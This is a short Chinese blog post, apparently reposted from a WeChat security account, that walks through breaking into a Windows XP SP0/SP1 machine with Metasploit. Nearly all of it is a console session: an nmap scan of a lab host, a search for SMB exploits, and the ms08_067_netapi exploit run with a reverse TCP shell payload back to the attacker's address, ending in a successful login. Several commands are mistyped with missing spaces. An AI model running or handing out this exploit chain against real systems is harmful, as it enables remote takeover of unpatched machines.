入侵(适用于windows xp sp0 sp1,只看思路) 类似 armitage

admin 2021年7月20日06:03:34评论215 views字数 1348阅读4分29秒阅读模式

root@kali:~# msfconsole

msf > workspace

msf > db_status

msf > workspace -a testlab

msf > db_nmap -T4 -A 192.168.1.78

msf > hosts

msf > services

msf exploit(ms06_040_netapi) > searchnetapi

 

Matching Modules

================

 

  Name                                Disclosure Date  Rank    Description

  ----                                ---------------  ----    -----------

  exploit/windows/smb/ms03_049_netapi 2003-11-11       good    MS03-049 Microsoft Workstation ServiceNetAddAlternateComputerName Overflow

  exploit/windows/smb/ms06_040_netapi 2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalizeOverflow

  exploit/windows/smb/ms06_070_wkssvc 2006-11-14       manual  MS06-070 Microsoft Workstation ServiceNetpManageIPCConnect Overflow

  exploit/windows/smb/ms08_067_netapi 2008-10-28       great   MS08-067 Microsoft Server Service RelativePath Stack Corruption

 

msf > useexploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > showpayloads

msf exploit(ms08_067_netapi) > setpayload windows/shell_reverse_tcp

payload => windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > set rhost192.168.1.78

rhost => 192.168.1.78

msf exploit(ms08_067_netapi) > set lhost192.168.1.242

lhost => 192.168.1.242

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > exploit                              (成功登陆)


本文始发于微信公众号(飓风网络安全):入侵(适用于windows xp sp0 sp1,只看思路) 类似 armitage

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月20日06:03:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   入侵(适用于windows xp sp0 sp1,只看思路) 类似 armitagehttp://cn-sec.com/archives/359212.html

发表评论

匿名网友 填写信息